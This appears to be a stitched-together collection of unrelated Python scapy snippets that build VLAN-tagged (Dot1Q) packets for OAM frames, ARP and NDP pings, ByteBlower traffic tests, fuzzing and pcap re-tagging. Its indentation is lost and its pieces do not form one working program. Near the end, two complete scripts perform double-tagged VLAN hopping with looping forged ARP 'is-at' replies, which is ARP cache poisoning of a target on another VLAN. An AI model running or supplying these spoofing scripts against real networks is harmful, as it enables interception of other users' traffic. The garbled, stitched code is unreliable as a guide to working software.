def send_frame(self, frame_body):
PACKET = Ether()
PACKET.length = 64
PACKET.dst = self.dst
PACKET.src = self.getHwAddr(self.interface)
if self.stag:
# WARNING: September/2016: This should be 0x88a8, but the Intel 10G
# hardware I am currently using does not support receiving a TPID of
# 0x88a8. So, I send double CTAGs, and I usually set this to 0x8100.
# (NOTE: The Intel hardware can send a TPID of 0x88a8)
PACKET.type = 0x8100
if self.ctag:
PACKET/=Dot1Q(type=0x8100,vlan=int(self.stag))
PACKET/=Dot1Q(type=self.etype,vlan=int(self.ctag))
else:
PACKET/=Dot1Q(type=self.etype,vlan=int(self.stag))
else:
if self.ctag:
PACKET.type = 0x8100
PACKET/=Dot1Q(type=self.etype,vlan=int(self.ctag))
else:
PACKET.type = self.etype
# PACKET/=Dot1Q(type=self.etype, vlan=int(self.ctag))
PACKET/=SlowProtocolsSubtype()/FlagsBytes()/OAMPDU()
PACKET/=frame_body
PACKET/=EndOfPDU()
if (self.verbose == True):
PACKET.show()
print '###[ Frame Length %d (before padding) ]###' % len(PACKET)
if (self.hexdump == True):
print hexdump(PACKET)
if (self.dryrun != True):
sendp(PACKET, iface=self.interface, verbose=self.verbose)
time.sleep(self.sleep)
return PACKET
def main():
if len(sys.argv) < 4:
print 'pass 3 arguments: <destination> <vlan ID> "<message>"'
exit(1)
addr = socket.gethostbyname(sys.argv[1])
iface = get_if()
ip_addr = get_if_addr(iface)
vlanID = int(sys.argv[2])
#print 'iface %s' % iface
#print 'iface ip @ %s' % ip_addr
pkt = Ether(src=get_if_hwaddr(iface), dst="ff:ff:ff:ff:ff:ff") / Dot1Q(
vlan=5) / Dot1Q(vlan=vlanID) / IP(
src=ip_addr, dst=addr, options=IPOption_MRI(
count=0, swtraces=[])) / UDP(dport=4321,
sport=1234) / sys.argv[3]
# pkt = Ether(src=get_if_hwaddr(iface), dst="ff:ff:ff:ff:ff:ff") / IP(
# dst=addr, options = IPOption_MRI(count=2,
# swtraces=[SwitchTrace(swid=0,qdepth=0), SwitchTrace(swid=1,qdepth=0)])) / UDP(
# dport=4321, sport=1234) / sys.argv[2]
#pkt.show2()
#hexdump(pkt)
try:
for i in range(int(sys.argv[4])):
sendp(pkt, iface=iface)
sleep(1)
except KeyboardInterrupt:
raise
def ndpPing(mac, vlan, ip):
src_mac = get_ether_address(network.BRIDGE_NAME)
packet = Ether(src=src_mac, dst=mac)
if_name = vlan
if '.' in vlan:
if_name, vlan_id = vlan.rsplit('.', 1)
vlan_id = int(vlan_id)
if vlan_id:
packet = packet / Dot1Q(vlan=vlan_id)
local_ip = None
for ip6 in netconf.get_current_ipv6(cidr=False)['ips']:
if ip6.startswith('fe80'):
local_ip = ip6
else:
src_ip = ip6
break
else:
if local_ip is None:
src_ip = 'fe80::66:66' # we need a source IP...
else:
src_ip = local_ip
packet = packet / IPv6(src=src_ip, dst=ip)
packet = packet / ICMPv6ND_NS(tgt=ip)
sendp(packet, iface=if_name)
def pkt(self):
pkt = Ether(dst=self.cfg["dst"], src=self.cfg.get("src", None))
vid = self.cfg.get("vid", None)
if vid is not None:
pkt = pkt / Dot1Q(vlan=vid)
return pkt
def packet_out(self, in_port, out_port, data):
in_port = "CONTROLLER" if in_port == ofp.OFPP_CONTROLLER else in_port
print "PACKET OUT (%s => %s): " % (in_port, out_port)
hexdump(data)
if self.in_out_iface is not None:
try:
# disect the packet
pkt = Ether(data)
# remove payload from Ether frame
payload = pkt.payload
payload_type = pkt.type
pkt.remove_payload()
# insert Dot1Q shim with vlan_id = out_port
if self.in_out_stag is None:
## WARNING -- This was changed from 0x88a8 to 0x8100 when
## testing with the Intel XL710 quad 10GE boards. The
## XL710 does not support the TPID for the STAG.
##
## Long term, it should be changed back to 0x88a8!
##
pkt.type = 0x8100
new_pkt = pkt / Dot1Q(vlan=out_port,
type=payload_type) / payload
else:
pkt.type = 0x8100
new_pkt = (pkt /
Dot1Q(vlan=self.in_out_stag, type=0x8100) /
Dot1Q(vlan=out_port, type=payload_type) /
payload)
# send out the packet
sendp(new_pkt, iface=self.in_out_iface)
except Exception, e:
logging.exception(
"Could not parse packet-out data as scapy.Ether:\n")
logging.error(hexdump(data, 'return'))
def send_arp(iface, src_ip, vlan, src_mac, dst_ip, silence=False):
if vlan == 0:
pkt = Ether(dst="ff:ff:ff:ff:ff:ff", src=src_mac, type=0x0806)
else:
pkt = Ether(dst="ff:ff:ff:ff:ff:ff", src=src_mac, type=0x8100) / Dot1Q(
vlan=vlan, prio=0)
pkt = pkt / ARP(hwtype=0x0001,
ptype=0x0800,
op=0x0001,
hwdst="ff:ff:ff:ff:ff:ff",
hwsrc=src_mac,
psrc=src_ip,
pdst=dst_ip)
if not silence:
print '>', print_arp_packet(pkt, 'REQUEST')
sendp(pkt, iface=iface, verbose=0)
def send_icmp(iface, src_ip, vlan, src_mac, dst_ip, dst_mac, ip_id, icmp_id,
icmp_seq, ttl, protocol):
if vlan == 0:
pkt = Ether(dst=dst_mac, src=src_mac, type=0x0800)
else:
pkt = Ether(dst=dst_mac, src=src_mac, type=0x8100) / Dot1Q(vlan=vlan,
prio=0)
pkt = pkt / IP(id=ip_id,
src=src_ip,
dst=dst_ip,
ttl=ttl,
len=(len(icmp_payload) + 28)) / ICMP(
id=icmp_id, seq=icmp_seq) / icmp_payload
if protocol == 'ICMP':
print '>', print_icmp_packet(pkt)
else:
print '>', print_traceroute(pkt, 'REQUEST')
sendp(pkt, iface=iface, verbose=0)
def arpPing(mac, vlan, ip):
src_mac = get_ether_address(network.BRIDGE_NAME)
packet = Ether(src=src_mac, dst=mac)
if_name = vlan
if '.' in vlan:
if_name, vlan_id = vlan.rsplit('.', 1)
vlan_id = int(vlan_id)
if vlan_id:
packet = packet / Dot1Q(vlan=vlan_id)
try:
src_ip = netconf.get_current_ipv4(cidr=False)['ips'][0]
except IndexError:
src_ip = '169.254.66.66' # we need a source IP...
packet = packet / ARP(hwsrc=src_mac, psrc=src_ip, hwdst=mac, pdst=ip)
sendp(packet, iface=if_name)
def main():
if len(sys.argv) < 3:
print("Pass 3 arguments: <interface> <destination>")
exit(1)
addr = socket.gethostbyname(sys.argv[2])
iface = sys.argv[1]
print("Sending on interface %s to %s" % (iface, str(addr)))
while True:
print
# s = str(raw_input('Type space separated port nums '
# '(example: "2 3 2 2 1") or "q" to quit: '))
s = str(
input(
"Type (1) for hs-fra->ams->hd, (2) for hs->fra->bud->ams->hd or (q) to quit: "
""))
if s == "q":
break
if s == "1":
option = 2453734152
elif s == "2":
option = 13895308368653518001
else:
continue
pkt = Ether(src=get_if_hwaddr(iface),
dst="ff:ff:ff:ff:ff:ff") / Dot1Q(vlan=101)
try:
# pkt = pkt / SourceRoute(nrouteid=int(p))
pkt = pkt / SourceRoute(nrouteid=option)
except ValueError:
pass
pkt = pkt / IP(dst=addr) / UDP(dport=4321, sport=1234)
pkt.show2()
for i in range(20):
sendp(pkt, iface=iface, verbose=False)
time.sleep(1)
def send_tcp(iface, src_ip, vlan, src_mac, dst_ip, dst_mac, ip_id, src_port,
dst_port, tcp_seq):
if vlan == 0:
pkt = Ether(dst=dst_mac, src=src_mac, type=0x0800)
else:
pkt = Ether(dst=dst_mac, src=src_mac, type=0x8100) / Dot1Q(vlan=vlan,
prio=0)
pkt = pkt / IP(
id=ip_id,
src=src_ip,
dst=dst_ip,
len=40,
) / TCP(
sport=src_port,
dport=dst_port,
seq=tcp_seq,
flags='S',
)
print '>', print_tcp_packet(pkt)
sendp(pkt, iface=iface, verbose=0)
def main():
if len(sys.argv) < 2 or len(sys.argv) > 4:
print "Usage: send.py <target_ip> [<target_mac>] [<vlan_id>]"
sys.exit(1)
dstip = sys.argv[1]
if len(sys.argv) > 2:
dstmac = sys.argv[2]
else:
dstmac = "FF:FF:FF:FF:FF:FF"
if len(sys.argv) > 3:
vid = long(sys.argv[3])
else:
vid = None
while (1):
msg = raw_input("What do you want to send: ")
if vid is None:
sendp(Ether(dst=dstmac) / IP(dst=dstip) / msg)
else:
sendp(Ether(dst=dstmac) / Dot1Q(vlan=vid) / IP(dst=dstip) / msg)
def __create_packets(self):
pkts = []
srcmac_str = self.l2fields['srcmac']
dstmac_str = self.l2fields['dstmac']
vlan = self.l2fields['vlan']
l2payload_size = self.l2fields['l2payload_size']
if 0 == l2payload_size:
l2payload_size = DEFAULT_LEN
l2payload = L2Payload(_l2payload='\x01' * l2payload_size)
for _ in range(self.totpkts):
pkt = Ether(src=srcmac_str, dst=dstmac_str)
if self.l2fields_inc['srcmac']:
srcmac_str = _inc_mac(srcmac_str)
if self.l2fields_inc['dstmac']:
dstmac_str = _inc_mac(dstmac_str)
if vlan != 0:
pkt = pkt / Dot1Q(vlan=vlan)
if self.l2fields_inc['vlan']:
vlan = _inc_vlan(vlan)
pkt = pkt
pkt = pkt / l2payload
pkts.append(pkt)
return pkts
def run(self):
byteblower_instance = ByteBlower.InstanceGet()
print("Connecting to ByteBlower server %s..." % self.server_address)
self.server = byteblower_instance.ServerAdd(self.server_address)
print("Creating ports")
# Do check the provision_port code. The vlan has
# a small impact there.
self.port_1 = self.provision_port(self.port_1_config)
self.port_2 = self.provision_port(self.port_2_config)
# Creating the stream where we'll sent the traffic from.
# Most is the same as the basic IPv4 example.
stream = self.port_1.TxStreamAdd()
stream.NumberOfFramesSet(self.number_of_frames)
stream.InterFrameGapSet(self.interframegap_ns)
frame = stream.FrameAdd()
# Collect the basic addressing info for the Tx side.
# VLAN id handled lower in the code.
src_ip = self.port_1_config['ip_address']
src_mac = self.port_1.Layer2EthIIGet().MacGet()
dst_ip = self.port_2_config['ip_address']
dst_mac = self.port_1.Layer3IPv4Get().Resolve(dst_ip)
frame_size = 512
udp_src = 4096
udp_dest = 4096
payload = 'a' * (frame_size - 42)
from scapy.layers.inet import UDP, IP, Ether
from scapy.all import Raw
# We will need to add a VLAN layer in the frame to transmit.
# In scapy Vlans are represented in the Dot1Q class.
from scapy.all import Dot1Q
udp_payload = Raw(payload.encode('ascii', 'strict'))
udp_header = UDP(dport=udp_dest, sport=udp_src)
ip_header = IP(src=src_ip, dst=dst_ip)
eth_header = Ether(src=src_mac, dst=dst_mac)
# A stream will always send the packet just as configured.
# When the Tx ByteBlower port has a VLAN, we need to add it to frame to
# be sent. The following lines are the only difference compared to
# the basic IPv4 example.
if 'vlan' in self.port_1_config:
vlan_id = self.port_1_config['vlan']
vlan_header = Dot1Q(vlan=vlan_id)
scapy_frame = eth_header / vlan_header / ip_header / udp_header / udp_payload
else:
scapy_frame = eth_header / ip_header / udp_header / udp_payload
# As noted above, the remainder of the stream config is the same again.
frame_content = bytearray(bytes(scapy_frame))
hexbytes = ''.join((format(b, "02x") for b in frame_content))
frame.BytesSet(hexbytes)
# create a trigger to count the number of received frames.
# Similar to the stream we will need to make a slight modification
# for the Vlan layer.
trigger = self.port_2.RxTriggerBasicAdd()
# The BPF filter on a trigger is promiscous: it will be applied to all
# traffic that arrives at the Physical interface.
#
# When we expect to receive packets with a VLAN, we need to add
# this element to the filter.
if 'vlan' in self.port_2_config:
rx_vlan_id = str(self.port_2_config['vlan'])
bpf_filter = "vlan {} and ip dst {} and udp port {}".format(
rx_vlan_id, dst_ip, udp_dest)
else:
bpf_filter = "ip dst {} and udp port {}".format(dst_ip, udp_dest)
trigger.FilterSet(bpf_filter)
# The above filter was the last change necessary in this method.
# The remainder, result gathering and cleanup is the same.
# VLAN info will be list in the port description below.
print("Current ByteBlower configuration:")
print("port1:", self.port_1.DescriptionGet())
print("port2:", self.port_2.DescriptionGet())
print("Starting traffic")
trigger.ResultClear()
stream_history = stream.ResultHistoryGet()
trigger_history = trigger.ResultHistoryGet()
duration_ns = self.interframegap_ns * self.number_of_frames
duration_s = duration_ns / 1000000000 + 1
# Running the test. No difference here.
# For more info on specific methods, do look into
# the API specification (http:\\api.byteblower.com)
# or the ipv4.py example.
stream.Start()
for iteration in range(1, int(duration_s)):
sleep(1)
stream_history.Refresh()
trigger_history.Refresh()
last_interval_tx = stream_history.IntervalLatestGet()
last_interval_rx = trigger_history.IntervalLatestGet()
print("Sent {TX} frames, received {RX} frames".format(
TX=last_interval_tx.PacketCountGet(),
RX=last_interval_rx.PacketCountGet()))
print("Done sending traffic (time elapsed)")
print("Waiting for a second")
sleep(1)
# Collect and show the results.
stream_result = stream.ResultGet()
trigger_result = trigger.ResultGet()
stream_result.Refresh()
print("Stream result:", stream_result.DescriptionGet())
trigger_result.Refresh()
print("Trigger result:", trigger_result.DescriptionGet())
tx_frames = stream_result.PacketCountGet()
rx_frames = trigger_result.PacketCountGet()
print("Sent {TX} frames, received {RX} frames".format(
TX=tx_frames, RX=rx_frames))
return [tx_frames, rx_frames]
def resolve(cls, wan_device, private_device, udp_src_port, udp_dst_port):
from scapy.layers.inet import UDP, IP, Ether
from scapy.layers.inet6 import IPv6
from scapy.all import Dot1Q
wan_port = wan_device.bbport
private_port = private_device.bbport
private_l3 = private_port.Layer3IPv4Get()
if private_device.iptype == 6:
private_l3 = private_port.Layer3IPv6Get()
private_ip = private_device.ip
private_mac = private_port.Layer2EthIIGet().MacGet()
cap = None
stream = None
try:
resolved_mac = private_l3.Resolve(wan_device.ip)
stream = private_port.TxStreamAdd()
bb_frame = stream.FrameAdd()
scapy_frame = Ether(src=private_mac, dst=resolved_mac)
for vlan_id in private_device.vlans:
scapy_frame /= Dot1Q(vlan=vlan_id)
if private_device.iptype == 4:
scapy_frame /= IP(src=private_ip, dst=wan_device.ip)
else:
scapy_frame /= IPv6(src=private_ip, dst=wan_device.ip)
scapy_frame /= UDP(dport=udp_dst_port, sport=udp_src_port)
scapy_frame /= 'Excentis NAT Discovery packet'
frame_content = bytearray(bytes(scapy_frame))
hexbytes = ''.join((format(b, "02x") for b in frame_content))
# Send a single Probing frame.
bb_frame.BytesSet(hexbytes)
stream.NumberOfFramesSet(10)
stream.InterFrameGapSet(1000 * 1000) # 1 millisecond in nanos.
cap = wan_port.RxCaptureBasicAdd()
filter_elements = []
for vlan in wan_device.vlans:
filter_elements.append("vlan %d" % vlan)
# normal filter:
if wan_device.iptype == 4:
filter_elements.append("ip dst %s" % wan_device.ip)
else:
filter_elements.append("ip6 dst %s" % wan_device.ip)
filter_elements.append("udp port %d" % udp_dst_port)
bpf_filter = ' and '.join(filter_elements)
cap.FilterSet(bpf_filter)
cap.Start()
stream.Start()
# Stop as soon as you receive any response.
while True:
sniffed = cap.ResultGet()
sniffed.Refresh()
if sniffed.PacketCountGet() > 2:
break
time.sleep(0.1)
# The Capture needs to stopped explicitly.
cap.Stop()
# Process the response: retrieve all packets.
for f in sniffed.FramesGet():
data = bytearray(f.BufferGet())
raw = Ether(data)
if IP in raw and UDP in raw:
discovered_ip = raw['IP'].getfieldval('src')
discovered_udp_port = raw['UDP'].getfieldval('sport')
return discovered_ip, discovered_udp_port
if IPv6 in raw and UDP in raw:
discovered_ip = raw['IPv6'].getfieldval('src')
discovered_udp_port = raw['UDP'].getfieldval('sport')
return discovered_ip, discovered_udp_port
raise RuntimeError("NAT detection frames didn't get through")
finally:
if stream is not None:
private_port.TxStreamRemove(stream)
if cap is not None:
wan_port.RxCaptureBasicRemove(cap)
def create_between(self, name, flow_number, source, destination, number_of_frames=None, duration=None):
"""Create a flow for the current traffic profile
:type name: str
:type flow_number: int
:type source: Device
:type destination: Device
:type number_of_frames: int
:type duration: datetime.timedelta
:rtype: UdpFlow
"""
if source.iptype != destination.iptype:
raise RuntimeError("Source and destination devices do not have the"
"same IP configuration!"
"IPv4 vs IPv6")
if number_of_frames is None:
duration_s = duration.total_seconds()
number_of_frames = int(math.ceil(duration_s * 1e9 / self.interframegap_ns))
udp_src = 4096 + flow_number
udp_dest = 4096 + flow_number
# Collect the basic addressing info for the Tx side.
# VLAN id handled lower in the code.
src_ip = source.ip
src_mac = source.bbport.Layer2EthIIGet().MacGet()
source_l3 = source.bbport.Layer3IPv4Get()
if source.iptype == 6:
source_l3 = source.bbport.Layer3IPv6Get()
dst_ip = destination.ip
logging.info("Resolving destination MAC for %s", dst_ip)
dst_mac = source_l3.Resolve(dst_ip)
frame_dst_ip = destination.ip
frame_dst_port = udp_dest
filter_dst_ip = destination.ip
filter_dst_port = udp_dest
if source.nat and destination.nat:
raise RuntimeError("Cannot resolve traffic between multiple NAT ports")
if source.nat:
# no need to resolve here, since we only trigger on
# destination parameters
pass
if destination.nat:
logging.info("Resolving NAT parameters")
# destination port is behind a NAT, probably need to 'poke' a hole
frame_dst_ip, frame_dst_port = NATResolver.resolve(
wan_device=source, private_device=destination,
udp_src_port=udp_src, udp_dst_port=udp_dest
)
logging.info("Resolving destination MAC for %s", frame_dst_ip)
dst_mac = source_l3.Resolve(dst_ip)
stream = source.bbport.TxStreamAdd()
stream.NumberOfFramesSet(number_of_frames)
stream.InterFrameGapSet(self.interframegap_ns)
frame = stream.FrameAdd()
frame_overhead = 42
# IPv6 header is larger than an IPv4 header
if source.iptype == 6:
frame_overhead = 62
payload = 'a' * (self.frame_size - frame_overhead)
from scapy.layers.inet import UDP, Ether
from scapy.all import Raw, Dot1Q
# A stream will always send the packet just as configured.
# When the Tx ByteBlower port has a VLAN, we need to add it
# to frame to be sent.
# The following 5 lines are the only difference compared
# to the basic IPv4 example.
scapy_frame = Ether(src=src_mac, dst=dst_mac)
for vlan_id in source.vlans:
scapy_frame /= Dot1Q(vlan=vlan_id)
if source.iptype == 4:
from scapy.layers.inet import IP
scapy_frame /= IP(src=src_ip, dst=frame_dst_ip)
else:
from scapy.layers.inet6 import IPv6
scapy_frame /= IPv6(src=src_ip, dst=frame_dst_ip)
scapy_frame /= UDP(dport=frame_dst_port, sport=udp_src)
scapy_frame /= Raw(payload.encode('ascii', 'strict'))
logging.debug('Created frame %s', repr(scapy_frame))
frame_content = bytearray(bytes(scapy_frame))
hexbytes = ''.join((format(b, "02x") for b in frame_content))
frame.BytesSet(hexbytes)
# create a trigger to count the number of received frames.
# Similar to the stream we will need to make a slight modification
# for the Vlan layer.
trigger = destination.bbport.RxTriggerBasicAdd()
# The BPF filter on a trigger is promiscuous: it will be applied to all
# traffic that arrives at the Physical interface.
#
# When we expect to receive packets with a VLAN, we need to add
# this element to the filter.
filter_elements = []
for vlan in destination.vlans:
filter_elements.append("vlan %d" % vlan)
# normal filter:
if destination.iptype == 4:
filter_elements.append("ip dst %s" % filter_dst_ip)
else:
filter_elements.append("ip6 dst %s" % filter_dst_ip)
filter_elements.append("udp port %d" % filter_dst_port)
bpf_filter = ' and '.join(filter_elements)
trigger.FilterSet(bpf_filter)
return UdpFlow(name, stream, trigger)
size = int(sys.argv[2])
# Traffic option is used to choose between fuzzy or simple packet type.
if len(sys.argv) > 3:
traffic_opt = str(sys.argv[3])
else:
traffic_opt = ""
pktdump = PcapWriter(path, append=False, sync=True)
pkt = []
for i in range(0, size):
if traffic_opt == "fuzzy":
eth = Ether(src=RandMAC(), dst=RandMAC())
vlan = Dot1Q()
udp = UDP(dport=RandShort(), sport=RandShort())
ipv4 = IP(src=RandIP(), dst=RandIP(), len=random.randint(0, 100))
ipv6 = IPv6(src=RandIP6(), dst=RandIP6(), plen=random.randint(0, 100))
tcp = TCP(dport=RandShort(), sport=RandShort(), flags='S',
dataofs=random.randint(0, 15))
# IPv4 packets with fuzzing
pkt.append(fuzz(eth / ipv4 / udp))
pkt.append(fuzz(eth / ipv4 / tcp))
pkt.append(fuzz(eth / vlan / ipv4 / udp))
pkt.append(fuzz(eth / vlan / ipv4 / tcp))
# IPv6 packets with fuzzing
pkt.append(fuzz(eth / ipv6 / udp))
pkt.append(fuzz(eth / ipv6 / tcp))
if len(sys.argv) not in (3, 4):
raise SystemExit("Usage: " + sys.argv[0]
+ " input.pcap output.pcap [vlan-id]")
VLAN_ID = 42
if len(sys.argv) == 4:
try:
VLAN_ID = int(sys.argv[3])
except:
raise SystemExit("'" + sys.argv[3]
+ "' is not a valid VLAN identifier")
packets = []
for packet in rdpcap(sys.argv[1]):
layer = packet.firstlayer()
while not isinstance(layer, NoPayload):
if type(layer) is Ether:
# adjust ether type
layer.type = 0x8100
# add 802.1q layer between Ether and IP
dot1q = Dot1Q(vlan=VLAN_ID)
dot1q.add_payload(layer.payload)
layer.remove_payload()
layer.add_payload(dot1q)
layer = dot1q
layer = layer.payload
packets.append(packet)
wrpcap(sys.argv[2], packets)
try:
from scapy.all import RandMAC, RandIP, PcapWriter, RandIP6, RandShort, fuzz
from scapy.all import IPv6, Dot1Q, IP, Ether, UDP, TCP
except ModuleNotFoundError as err:
print(err + ": Scapy")
import sys
path = str(sys.argv[1]) + "/pcap/fuzzy.pcap"
pktdump = PcapWriter(path, append=False, sync=True)
for i in range(0, 2000):
# Generate random protocol bases, use a fuzz() over the combined packet
# for full fuzzing.
eth = Ether(src=RandMAC(), dst=RandMAC())
vlan = Dot1Q()
ipv4 = IP(src=RandIP(), dst=RandIP())
ipv6 = IPv6(src=RandIP6(), dst=RandIP6())
udp = UDP(dport=RandShort(), sport=RandShort())
tcp = TCP(dport=RandShort(), sport=RandShort())
# IPv4 packets with fuzzing
pktdump.write(fuzz(eth / ipv4 / udp))
pktdump.write(fuzz(eth / ipv4 / tcp))
pktdump.write(fuzz(eth / vlan / ipv4 / udp))
pktdump.write(fuzz(eth / vlan / ipv4 / tcp))
# IPv6 packets with fuzzing
pktdump.write(fuzz(eth / ipv6 / udp))
pktdump.write(fuzz(eth / ipv6 / tcp))
pktdump.write(fuzz(eth / vlan / ipv6 / udp))
#!/usr/bin/env python
# coding=utf-8
import time
from scapy.all import sendp, ARP, Ether, Dot1Q
iface = 'eth0'
tatget_ip = '192.168.1.100'
fake_ip = '192.168.1.200'
fake_mac = '11:22:33:aa:bb:cc'
self_vlan = 1
target_vlan = 2
packet = Ether()/ \
Dot1Q(vlan=self_vlan) / \
Dot1Q(vlan=target_vlan) / \
ARP(hwsrc=fake_mac,
pdst=tatget_ip,
psrc=fake_ip,
op='is-at')
while True:
sendp(packet, iface=iface)
time.sleep(2)
def get_dot1q(self, vlan):
return Dot1Q(vlan=vlan)
def sendUDPBroadcast(ip="255.255.255.255", sport=5060, dport=5050):
scapy.all.sendp( Ether(dst="ff:ff:ff:ff:ff:ff")/Dot1Q(vlan=1)/IP(dst=ip)/UDP(sport=sport,dport=dport)/Raw(load=b'\xa5\x00\x00\x00\x00\x02\x00\x00\x47\x23') )
#!/usr/bin/python3
import time
from scapy.all import sendp, ARP, Ether, Dot1Q
iface = "enp3s0f1"
target_ip = '192.168.13.23'
fake_ip = '192.168.13.5'
fake_mac = 'c0:d3:de:ad:be:ef'
our_vlan = 1
target_vlan = 2
packet = Ether() / \
Dot1Q(vlan=our_vlan) / \
Dot1Q(vlan=target_vlan) / \
ARP(hwsrc=fake_mac,
pdst=target_ip,
psrc=fake_ip,
op="is-at")
while True:
sendp(packet, iface=iface)
time.sleep(10)
